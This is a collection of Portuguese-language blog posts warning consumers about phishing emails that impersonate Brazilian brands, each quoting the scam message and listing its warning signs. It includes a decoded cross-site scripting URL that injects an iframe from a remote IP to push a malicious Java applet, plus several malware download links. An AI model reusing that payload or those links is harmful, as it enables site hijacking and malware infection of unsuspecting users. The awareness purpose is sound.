Existem diversos tipos de phishing scam, mas os mais conhecidos atualmente são os que simulam e-mails de banco e solicitam o download de algum dispositivo de “segurança” ou recadastramento de senhas, os golpes por SMS que oferecem “prêmios” por concursos inexistentes, foto-torpedo falso, as “fotos daquela festa” ou o “cartão virtual enviado por um admirador” e mais alguns outros.

Normalmente um phishing, principalmente os que são enviados por e-mail, escondem por trás o download de um malware, possivelmente um trojan horse.

---
Artigos relacionados:

Nenhum artigo relacionado

Apesar de visualmente muito bem feito, esse phishing scam que utiliza como motivação do clique um vale-compras inexistente d’O Boticário, deixa as pontinhas que nos fazem identificá-lo como balela. Anote as dicas e não caia em mais nenhuma:

1. Ok, a primeira e fundamental dica é que a mensagem não tem nenhum indício de que foi enviada para você. No destinatário de e-mail, há a indicação de múltiplo envio com ocultação dos endereços. No corpo da mensagem não há seu nome, o que seria fundamental num contexto de promoção, certo?
2. A segunda dica básica é a do tal cadastro. Você tem cadastro n’O Boticário? Ao fazer compras por lá você costuma fornecer seus dados para receber SPAM? Se sua resposta for negativa, já há indícios de irregularidade.
3. Considerando que você tenha imaginado que alguma boa alma tenha feito o cadastro em seu nome (tolinho…), vamos ao fato de que a marca é “O Boticário” e foi citada apenas como “Boticário” logo no início do e-mail (um erro que O Boticário não iria cometer), existem erros de português no meio do texto e a necessidade do download de um “formulário”.
4. Esse aliás, vale outro tópico. Se o seu nome foi selecionado do seu “cadastro”, eles sabem quem você é, e portanto, não precisariam pedir que você preenchesse nada, bastava um link único. O pior é enviar um arquivo executável (falha de segurança em qualquer rede com o mínimo de cuidado) e apenas em Windows. Não poderia ser um PDF? Não poderia ser um formulário em uma página da Internet? Não poderia, como disse antes, ser apenas um link? O mais simples de tudo: não poderia ter vindo o tal cupom diretamente em seu e-mail?

Cuidado crianças, pois a ambição pode nos levar a cair em muitos golpes, na Internet ou fora dela. Não clique, não baixe, não execute, tenha sempre um antivirus instalado e atualizado.

Mensagem original (screenshot)

Mensagem original (texto)

De: Boticario Online <promocaonativa@pfizer.com.br>
Assunto: Parabéns – Cliente Boticário, você foi contemplado
Data: 2 de fevereiro de 2010 00:55:12 BRST
Para: undisclosed-recipients:;

Parabéns!

Cliente Boticário, seu cadastro foi selecionado em nosso sistema e você ganhou um vale-compras no valor de R$ 340.00 (Trezentos e Quarenta Reais). Você foi contemplado na Promoção Nativa Spa.

Para retirar o seu prêmio em uma das nossas lojas, faça o download clicando no botão logo abaixo. Com o arquivo préviamente salvo, abra o formulário, preencha seus dados e imprima uma folha do vale-compra.

Lembrando que o mesmo é único e intransferível.

Mensagem recebida via e-mail em 2/2/2010

---
Artigos relacionados:

Nenhum artigo relacionado

Como evitar cair nesses golpes:

1. Sempre, sempre mesmo, verifique os remetentes e destinatários da mensagem. Se chega uma carta em sua casa com nome de outra pessoa você não abre, certo? Pois essa mensagem não tem seu nome em lugar algum, talvez apenas a primeira parte do seu e-mail no campo destinatário, mas isso é muito fácil deduzir.
2. Você é cliente MasterCard? Pergunta idiota, talvez a maior base de clientes de cartão de crédito no Brasil seja deles, mas não custa perguntar, certo? Você tem cartão Master? Costuma receber correspondências deles em seu e-mail? Cadastrou o seu e-mail na base do cartão?
3. Não clique: digite! O endereço para cadastro no programa exibido no e-mail é o verdadeiro (naotempreco.com.br), porém, ao clicar você é redirecionado para um site tosco hospedado no endereço programasurpreenda.freehostia.com, um site de hospedagem gratuita. Os mais displicentes nem perceberão que a URL não é a mesma e é aí que o golpe acaba funcionando.
4. Note logo abaixo, que a tela falsa de cadastro pede TODOS os seus dados mais sensíveis para participar do programa. Em nenhum momento pediu seu endereço ou telefone de contato, mas até o código de segurança do verso do cartão e seu CPF estão pedindo. Por que? Porque com esses dados é possível fazer qualquer compra pela Internet facilmente. O verdadeiro cadastro da MasterCard não pede mais que seu nome e data de nascimento, como dados sensíveis. Fique de olho!

Mensagem original (screenshot)

Tela do site falso (phishing scam)

Mensagem original (texto)

De: Informativo <Informativo@mastercard.com>
Assunto: Surpreenda com Mastercard
Data: 2 de fevereiro de 2010 02:16:11 BRST

Participe do Programa Surpreenda MasterCard

Para participar, basta cadastrar o cartão no site www.naotempreco.com.br/cadastro.
Após o cadastro, cada transação, de qualquer valor, vale um ponto. Os pontos podem
ser trocados por vouchers. Com o voucher, na compra de um dos produtos ou serviços
cadastrados na promoção, o portador do cartão ganha outro, de graça.

Os pontos acumulados que não forem trocados por vouchers transformam-se em cupons
que concorrem a sorteios mensais de dois cartões pré-pagos no valor de R$ 50 mil cada,
um para o titular do cartão e outro para presentear quem ele indicar.

Cadastre-se e comece a usufruir agora mesmo dos benefícios!

Atenciosamente,
Departamento de Promoções MasterCard®

Mensagem recebida por e-mail em 2/2/2010

---
Artigos relacionados:

Nenhum artigo relacionado

A mensagem é enviada via “direct“, uma forma de trocar mensagens apenas entre as pessoas que se seguem (a forma de adicionar “amigos” no Twitter) e que faz a mesma ter alguma certificação de veracidade. Acontece que a mensagem é maléfica e quem cai na roubada, automaticamente a reenvia para seus contatos, da mesma forma. Engenharia social muito bem feita.

Alguns links chegam comprimidos, o que dificulta a detecção imediata da bandidagem, mas ainda assim, vale a desconfiança antes do clique e as dicas de não baixar nada que você não saiba o que seja e muito menos executar o arquivo baixado. Os 4 “se”, são:

1. Se houver link, não clique;
2. Se clicar, não baixe;
3. Se baixar, não execute;
4. Se executar, não diga que eu não avisei.

Alguns exemplos de SCAM via Twitter

“olha oq fiz com suas fotos!!!! hahahha” – vai acreditar?

“Olha o twitter desse cara vc vai bolar de rir com isso!!!!” – aqui o link denuncia.

---
Artigos relacionados:

Nenhum artigo relacionado

Esse Scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:

1. Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
2. Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
3. Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:
   

   http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML=’<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>

4. Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.

Mensagem original (screenshot)

Tela que simula o site Americanas.com (screenshot)

Mensagem original (texto)

Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

Sempre confira se o link é para o site verdadeiro da Americanas.com

Nunca informe sua senha para terceiros.

Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.

Mensagem recebida por e-mail em 16/04/2008

---
Artigos relacionados:

Nenhum artigo relacionado

1. O email é malfeito, as tabelas não são bem formatadas, a redação é confusa, traz erros de português e está completamente fora do padrão da GOL.
2. O endereço do rementente não é da GOL, mas a Globo.com!
3. O texto é vago. “Sr(a)”?! Essa vaguidão nunca aconteceria num email vindo de empresa aérea. Numa compra real, a mensagem enviada pela empresa é que permite o check-in e a emissão do bilhete de embarque; por isso, dela sempre consta o nome do passageiro. Nunca embarcará um incerto “Sr(a)” num vôo.
4. “Sua operadora de cartão de crédito”? Qual? Emails verdadeiros dão detalhes sobre a forma de pagamento.
5. “Para este serviço não emitimos recibo, verifique seu extrato na próxima fatura ou solicite em qualquer guichê informando seu e-ticket” – agora, isso foi bizarro. O email de confirmação de compra de passagem aérea é, sim, um recibo. É com ele que você garante seu embarque e é ele que permite, se necessário, a contestação do pagamento junto à operadora do cartão de crédito.
6. Uma pessoa desesperada e desinformada já vai clicando no link para “estornar” a compra, sem perceber que ele não aponta para o domínio da GOL, mas para um tal www.voegol.checkin.com.
7. Se, mesmo depois de todos esses alertas, você estiver na dúvida sobre a tal compra, vá à sua agência bancária, consulte pela internet ou fale com a administradora do cartão de crédito. Verá que não há compra alguma. Você também pode acessar o site da empresa aérea (não clique em nenhum link do email – digite o endereço diretamente na barra ou faça uma pesquisa) e verificar que não existe passagem em seu nome com o tal “e-ticket number”.

Mensagem Original (screenshot):

Mensagem Original (texto):

De: Gol Linhas Aéreas <k0lten@globo.com>
Enviada em: quinta-feira, 17 de janeiro de 2008 03:46
Assunto: WebCompras GOL Linhas Aéreas – Compra realizada com sucesso. Dados do e-ticket.

Gol linhas aereas inteligentes, a frota mais jovem do Brasil.

Olá Sr(a).

Obrigado por escolher o WebCompras da GOL.

A sua operadora de cartão de crédito já confirmou a sua compra.

Daremos continuidade ao processamento do seu e-ticket.

Para este serviço não emitimos recibo, verifique seu extrato

na próxima fatura ou solicite em qualquer guichê informando

seu e-ticket.

E-ticket Number: YBTC1107KQ

Tarifa J Adulto R$ 725,80

Sex, 18 Jan 08

Vôo 1813

Vôo 1600

Mensagem recebida por email em 17 de janeiro de 2008.

* Colaborou: Lucia Freitas.

[tags]Gol,Passagem aérea,Scam,Virus,Compra[/tags]

---
Artigos relacionados:

Nenhum artigo relacionado

Esse scam da Livraria Siciliano não é dos piores: traz imagens comuns aos comunicados da livraria e não assassina a língua portuguesa (embora o último parágrafo esteja truncado). Mesmo assim, há várias pistas de que se trata de uma mensagem mal-intencionada:

1. O email vem do domínio silano.com.br. O scammer inventou um nome razoavelmente parecido com “Siciliano”, na esperança de enganar os desatentos.
2. Empresas online sempre comunicam a realização de uma compra incluindo alguns dados do destinatário (fornecidos por ele mesmo por meio de formulário de cadastro), como nome completo, endereço ou números relativos ao cartão de crédito. Se nenhuma identificação é provida, certamente o email é falso. Aqui, há apenas o “chute” da bandeira do cartão.
3. Se você nem é cadastrado na loja online em questão, claro que nenhuma notificação de compra sairia em seu nome.
4. Os links do pedido e do sugestivo “clique aqui” – os primeiros caminhos que você procuraria para suspender a compra – apontam para um endereço alheio à Siciliano e claramente destinado a infectar seu computador: http://videos1e2.50webs.com/Verificador.scr. Arquivos .scr são uma conhecida forma de propagação de malwares (softwares maliciosos).

Aqui, não restam dúvidas de que o email é engana-trouxa. Se, porém, algum dia você receber uma comunicação de compra e ficar na dúvida sobre sua autenticidade, faça o seguinte:

1. Visite o site da loja, digitando o endereço eletrônico diretamente na barra de navegação.
2. Acesse a área de pedidos, usando seu nome de usuário e senha.
3. Confira se há alguma compra não-autorizada.
4. Se houver, entre em contato diretamente com a loja para solicitar o estorno.

Cautela e caldo de galinha não fazem mal a ninguém, já diz a sabedoria popular.

Mensagem Original (screenshot):

Mensagem Original (texto):

From: Silano.com.br < informacoes@silano.com.br >
Date: 02/10/2007 18:41
Subject: Seu pedido foi encaminhado.

Data: 01/10/2007
Pedido nº: 2350789

Prezado Cliente,

É com satisfação que informamos que seu pedido nº 2350789 foi recebido. Confira-o abaixo.

Pedido
Produto: LIVRO
Titulo: Fortaleza Digital
Quantidade: 1
Preço: R$ 22,90

Produto: LIVRO
Titulo: Anjos E Demonios
Quantidade: 1
Preço: R$ 27,40

Produto: LIVRO
Titulo: Amor E Prosa, Sexo E Poesia
Quantidade: 1
Preço: R$ 26,91

Valor do Frete: R$ 15,80
Valor total do pedido: R$ 93,01
Forma de pagamento: Cartão de crédito em 3 vezes.
Cartão de crédito Mastercard

Lembramos que para pedidos com mais de um item, despachamos prontamente todos os itens disponíveis em estoque, enviando os demais itens em remessas complementares. O valor do frete fica sempre inalterado. No caso de uma eventual falta de produto, os valores pagos a mais serão devolvidos.

Você pode conferir o status dos seus pedidos Clique Aqui
ou sempre que quiser, basta clicar no link Status dos Pedidoslocalizado na parte superior direita de nossa página.

Caso tenha alguma dúvida ou sugestão, estamos sempre à sua disposição por e-mail ou pelo telefone.
Equipe siciliano.com.br atendimento@siciliano.com.br
(11) 3649 4747 (Grande São Paulo) 0300 789 3649* (Demais localidades)
Horário comercial, de segunda a sexta-feira, das 8:00 às 18:00
*Tarifa informada no inicio da ligação.

Mensagem recebida por email em 02 de outubro de 2007.

* Colaborou: Daniel Araujo.

[tags]compra,pedido,scam,Siciliano,trojan,virus[/tags]

---
Artigos relacionados:

Nenhum artigo relacionado

1. As Lojas Americanas não enviariam um email com dois erros de português logo no título e a ausência de letra maiúscula em “Americanas”. Há vários outros ao longo do texto, muito mal escrito.
2. O destinatário não é você, mas um nome genérico: “gnu.groups”.
3. Logo no início, a imagem apresenta um “Recebemos seu pedido” típico da loja, mas o corpo do email trata de assunto diverso. Os artistas não conseguiram fazer uma imagem convincente para “Pagamento recusado”, ou coisa que o valesse?
4. Alega-se a existência de compras “no seu CPF” – se fosse válido, o email indicaria o seu CPF, leitor, com todos os números.
5. Menciona-se uma vaga “instituição financeira”, sem dar nome aos bois.
6. Rapidinho, vem a solicitação: “faça o download”. Leia-se: infecte seu computador.
7. E, claro, a intimidação: se você não fizer o que dizemos, seu nome pode ir para o SPC ou SERASA.
8. “A forma de pagamento escolhida foi: Transferência bancária”. As Americanas não aceitam pagamento nessa modalidade.
9. Os links para as Americanas são legítimos, mas os links em “Visualizar extrato de débito“, “clique aqui” e “fale conosco” apontam para um arquivo do tipo .scr – disseminador de vírus e trojan.
10. O email do remetente parece legítimo – atendimento@americanas.com.br. Acontece que o email usado pela loja é email@americanas.com. “Ah, mas eu não tenho obrigação de saber disso”, você diz. Não mesmo, mas uma simples visita aos Tópicos Freqüentes, no site das Americanas, daria essa informação, e outras:

A Americanas.com não utiliza comunicação por spam e é contra essa prática. Os e-mails da empresa têm link direto para o site da Americanas.com ou para sites parceiros, e não possuem arquivos executáveis ou links para download.

Os e-mails promocionais da Americanas.com têm como único remetente o endereço email@americanas.com.

Caso desconfie da procedência de um e-mail, por favor, entre em contato conosco, acessando um de nossos canais de atendimento, informados na página inicial da CENTRAL DE ATENDIMENTO.

Como você vê, só cai nessa balela quem quiser.

Mensagem Original (screenshot):

Mensagem Original (texto):

De: atendimento@americanas.com.br
Assunto: Setor financeiro americanas: relatorio de debito
Data: 9 de dezembro de 2007 20h29min50s GMT-02:00

Comunicamos que consta em nossos computadores o débito de R$1.996,90 feita com seu CPF , na qual a instituição financeira estornou os pagamentos alegando se tratar de transações fraudulentas.
ATENÇÃO! Faça o download do extrato para verificar detalhes sobre os seus débitos com as americanas.com. Após a verificação do extrato, caso não reconheça as compras efetuadas assim como dados da entrega dos pedidos, favor entrar em contato com 4004-3824 ou 0xx11 2195-3824 para que possamos alertar as autoridades sobre o ocorrido , e assim, também, não incluir seu nome no SPC e SERASA .

Visualizar extrato de débito

A forma de pagamento escolhida foi:
Transferência bancária – Valor R$ 1.996.90

Visualizar extrato de débito

• Pedimos a vossa atenção a este comunicado, pois, medidas legais serão adotadas, tais como a inclusão em nosso Sistema de Proteção ao Crédito e Bloqueio no Cadastro Nacional de Pessoa Física, bem como no Cadastro Nacional de Pessoa Jurídica.
• a partir deste momento, não é possível a devolução de itens.
• clique aqui para obter mais informações sobre sua compra.
• Se desejar mais informações sobre o processo de compras na Americanas.com, clique aqui .
• Caso reste alguma dúvida, acesse o fale conosco.

Mensagem recebida em 18 de dezembro de 2007.

* Colaborou: Lucia Freitas.

[tags]americanas.com,compra,cpf,scam,serasa,spc,trojan,virus[/tags]

---
Artigos relacionados:

Nenhum artigo relacionado

Esperamos ter contribuído e continuar fazendo esse trabalho de conscientização e prevenção por muito tempo. Continue acessando, lendo as nossas dicas e contribuindo para o crescimento da base de dados.

[tags]Anúncio, Natal, SCAM[/tags]

---
Artigos relacionados:

Nenhum artigo relacionado

Vou desconsiderar todas as falhas de identificação de remetente e destinatário, pois existem os fatores surpresa e admiração anônima envolvidos numa correspondência desse tipo. Vou me ater simplesmente ao principal meio de se identificar uma balela desse tipo: O link apresentado, além de apontar para um local diferente do especificado no texto (fora do domínio voxcards.ig.com.br), pede para fazer download de um arquivo do tipo executável.

Arquivos executáveis, é sempre bom lembrar, podem conter ameaças de segurança para sua máquina, vírus, programas maliciosos. Trojans, por exemplo, são programas utilizados para espionagem e roubo de dados (senhas principalmente).

Mensagem original (screenshot)

Mensagem original (texto)

Esta é uma mensagem automática. Por favor, não responda!

Olá Meu amor,
Você está recebendo um cartão virtual VOXCARDS remetido por:

Quem te ama muito…

clique aqui para ver seu cartão

http://voxcards.ig.com.br/dc/2DF7B41158034FB9A74B85A8F01BD66E

Caso não consiga visualizá-lo, digite o código 2DF7B41158034FB9A74B85A8F01BD66E no campo existente em nossa página principal.

Este cartão ficará disponível por 20 dias.

Mensagem original recebida em 01/06/2007

---
Artigos relacionados:

Nenhum artigo relacionado